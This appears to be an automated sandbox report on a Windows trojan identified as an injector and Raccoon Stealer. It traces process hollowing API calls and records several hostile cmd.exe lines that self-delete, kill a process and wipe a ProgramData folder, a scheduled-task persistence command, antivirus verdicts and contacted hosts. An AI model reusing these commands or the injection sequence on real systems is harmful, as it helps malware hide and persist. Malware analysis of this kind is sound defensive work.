creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000294
1 1 0

CreateProcessInternalW

 thread_identifier: 2608
thread_handle: 0x00000230
process_identifier: 2604
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\zxcv.EXE
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\zxcv.EXE
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000224
1 1 0

NtGetContextThread

 thread_handle: 0x00000230
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 2604
process_handle: 0x00000224
1 0 0

NtMapViewOfSection

 section_handle: 0x00000210
process_identifier: 2604
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x00400000
allocation_type: 0 ()
section_offset: 0
view_size: 630784
process_handle: 0x00000224
1 0 0

NtSetContextThread

 registers.eip: 4804608
registers.esp: 1638384
registers.edi: 0
registers.eax: 4456511
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2004287940
thread_handle: 0x00000230
process_identifier: 2604
1 0 0

NtResumeThread

 thread_handle: 0x00000230
suspend_count: 1
process_identifier: 2604
1 0 0

CreateProcessInternalW

 thread_identifier: 2712
thread_handle: 0x00000118
process_identifier: 2708
current_directory:
filepath: C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000120
1 1 0

NtGetContextThread

 thread_handle: 0x00000118
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 2708
process_handle: 0x00000120
1 0 0

NtMapViewOfSection

 section_handle: 0x000000e0
process_identifier: 2708
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x00400000
allocation_type: 0 ()
section_offset: 0
view_size: 151552
process_handle: 0x00000120
1 0 0

NtSetContextThread

 registers.eip: 4325376
registers.esp: 1638384
registers.edi: 0
registers.eax: 4302468
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2004287940
thread_handle: 0x00000118
process_identifier: 2708
1 0 0

NtResumeThread

 thread_handle: 0x00000118
suspend_count: 1
process_identifier: 2708
1 0 0

CreateProcessInternalW

 thread_identifier: 2764
thread_handle: 0x00000118
process_identifier: 2760
current_directory:
filepath: C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000120
1 1 0

NtGetContextThread

 thread_handle: 0x00000118
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 2760
process_handle: 0x00000120
1 0 0

NtMapViewOfSection

 section_handle: 0x000000e0
process_identifier: 2760
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x00400000
allocation_type: 0 ()
section_offset: 0
view_size: 233472
process_handle: 0x00000120
1 0 0

NtSetContextThread

 registers.eip: 4407296
registers.esp: 1638384
registers.edi: 0
registers.eax: 4291211
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2004287940
thread_handle: 0x00000118
process_identifier: 2760
1 0 0

NtResumeThread

 thread_handle: 0x00000118
suspend_count: 1
process_identifier: 2760
1 0 0

NtResumeThread

 thread_handle: 0x00000144
suspend_count: 1
process_identifier: 2604
1 0 0

CreateProcessInternalW

 thread_identifier: 3288
thread_handle: 0x000007c0
process_identifier: 3284
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\NKHh91jIt3.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007c8
1 1 0

CreateProcessInternalW

 thread_identifier: 3360
thread_handle: 0x000007c8
process_identifier: 3356
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\Qv4SXRxX8p.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\Qv4SXRxX8p.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\Qv4SXRxX8p.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007cc
1 1 0

CreateProcessInternalW

 thread_identifier: 3408
thread_handle: 0x0000079c
process_identifier: 3404
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\4a3K8bEiw2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\4a3K8bEiw2.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\4a3K8bEiw2.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007b4
1 1 0

CreateProcessInternalW

 thread_identifier: 3480
thread_handle: 0x000007c0
process_identifier: 3476
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\KllTrtJVOr.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\KllTrtJVOr.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\KllTrtJVOr.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007d0
1 1 0

CreateProcessInternalW

 thread_identifier: 3552
thread_handle: 0x000007c4
process_identifier: 3548
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\Qs4zrKsMII.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007d4
1 1 0

CreateProcessInternalW

 thread_identifier: 3588
thread_handle: 0x000007c0
process_identifier: 3584
current_directory:
filepath:
track: 1
command_line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000007b4
1 1 0

NtResumeThread

 thread_handle: 0x000000ec
suspend_count: 1
process_identifier: 2708
1 0 0

CreateProcessInternalW

 thread_identifier: 2576
thread_handle: 0x000004f8
process_identifier: 2568
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath: C:\Users\test22\AppData\Local\Temp\ac.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\ac.exe
stack_pivoted: 0
creation_flags: 67109904 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT)
inherit_handles: 0
process_handle: 0x000004e8
1 1 0

CreateProcessInternalW

 thread_identifier: 2756
thread_handle: 0x00000500
process_identifier: 2780
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath: C:\Users\test22\AppData\Local\Temp\rc.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\rc.exe
stack_pivoted: 0
creation_flags: 67109904 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT)
inherit_handles: 0
process_handle: 0x000004fc
1 1 0

CreateProcessInternalW

 thread_identifier: 2876
thread_handle: 0x00000508
process_identifier: 2852
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath: C:\Users\test22\AppData\Local\Temp\ds1.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\ds1.exe
stack_pivoted: 0
creation_flags: 67109904 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT)
inherit_handles: 0
process_handle: 0x00000504
1 1 0

CreateProcessInternalW

 thread_identifier: 2860
thread_handle: 0x00000510
process_identifier: 2856
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath: C:\Users\test22\AppData\Local\Temp\ds2.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\ds2.exe
stack_pivoted: 0
creation_flags: 67109904 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT)
inherit_handles: 0
process_handle: 0x0000050c
1 1 0

CreateProcessInternalW

 thread_identifier: 2160
thread_handle: 0x00000518
process_identifier: 200
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath: C:\Users\test22\AppData\Local\Temp\cc.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\cc.exe
stack_pivoted: 0
creation_flags: 67109904 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT)
inherit_handles: 0
process_handle: 0x00000514
1 1 0

CreateProcessInternalW

 thread_identifier: 288
thread_handle: 0x00000564
process_identifier: 2400
current_directory: C:\Users\test22\AppData\Roaming\
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "GDSFbnvfghsrf.exe"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000568
1 1 0

CreateProcessInternalW

 thread_identifier: 256
thread_handle: 0x00000280
process_identifier: 1096
current_directory: C:\ProgramData
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 2760 & erase C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe & RD /S /Q C:\\ProgramData\\562700353122373\\* & exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000278
1 1 0

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

 thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 2568
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtResumeThread

 thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2568
1 0 0

CreateProcessInternalW

 thread_identifier: 3772
thread_handle: 0x000003d0
process_identifier: 3768
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ddoAzF" /XML "C:\Users\test22\AppData\Local\Temp\tmpA553.tmp"
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d4
1 1 0

CreateProcessInternalW

 thread_identifier: 3848
thread_handle: 0x00000370
process_identifier: 3844
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\ac.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\test22\AppData\Local\Temp\ac.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000036c
1 1 0

NtGetContextThread

 thread_handle: 0x00000370
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3844
region_size: 73728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000036c
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à ¨ Ç à@  @…ÄÆWàÿ  H.text$§ ¨ `.rsrcÿàª@@.reloc ²@B
base_address: 0x00400000
process_identifier: 3844
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00402000
process_identifier: 3844
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€ àÌlã“Ì4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.02 InternalNameStub.exe&LegalCopyright*LegalTrademarks: OriginalFilenameStub.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>
base_address: 0x0040e000
process_identifier: 3844
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

 buffer: À 7
base_address: 0x00410000
process_identifier: 3844
process_handle: 0x0000036c
1 1 0
Bkav W32.AIDetect.malware1
Lionic Trojan.Win32.Chapak.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.37249573
ALYac Trojan.GenericKD.37249573
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 0057f1c81 )
Alibaba Trojan:Win32/Chapak.182d0dbc
K7GW Trojan ( 0057f1c81 )
Cybereason malicious.72e94a
BitDefenderTheta Gen:NN.ZevbaF.34796.mn0@amUBMcA
ESET-NOD32 a variant of Win32/Injector.EPQK
APEX Malicious
Paloalto generic.ml
ClamAV Win.Malware.Trojanx-9875328-0
Kaspersky Trojan.Win32.Chapak.ezur
BitDefender Trojan.GenericKD.37249573
Avast Win32:TrojanX-gen [Trj]
Rising Trojan.Injector!1.C6AF (CLASSIC)
Ad-Aware Trojan.GenericKD.37249573
Sophos Generic ML PUA (PUA)
DrWeb Trojan.Siggen14.18758
TrendMicro TROJ_GEN.R002C0PGF21
FireEye Generic.mg.e0ee46172e94ab9a
Emsisoft Trojan.GenericKD.37249573 (B)
SentinelOne Static AI - Suspicious PE
Avira TR/Dropper.Gen
MAX malware (ai score=87)
Kingsoft Win32.Troj.Chapak.ez.(kcloud)
Microsoft PWS:Win32/Racealer.RTH!MTB
Gridinsoft Trojan.Win32.Downloader.sa
Arcabit Trojan.Generic.D2386225
GData Trojan.GenericKD.37249573
Cynet Malicious (score: 100)
McAfee GenericRXPE-NN!E0EE46172E94
VBA32 BScope.TrojanPSW.Stelega
Malwarebytes Spyware.RaccoonStealer
TrendMicro-HouseCall TROJ_GEN.R002C0PGF21
Ikarus Trojan.Win32.Injector
Fortinet W32/EPQK.NN!tr
AVG Win32:TrojanX-gen [Trj]
Panda Trj/GdSda.A
CrowdStrike win/malicious_confidence_100% (W)
Qihoo-360 Win32/Trojan.Chapak.HgIASYkA
dead_host 192.168.56.102:49332
dead_host 192.168.56.102:49320
dead_host 79.134.225.25:6970
dead_host 192.168.56.102:49261
dead_host 192.168.56.102:49313
dead_host 192.168.56.102:49330
dead_host 192.168.56.102:49265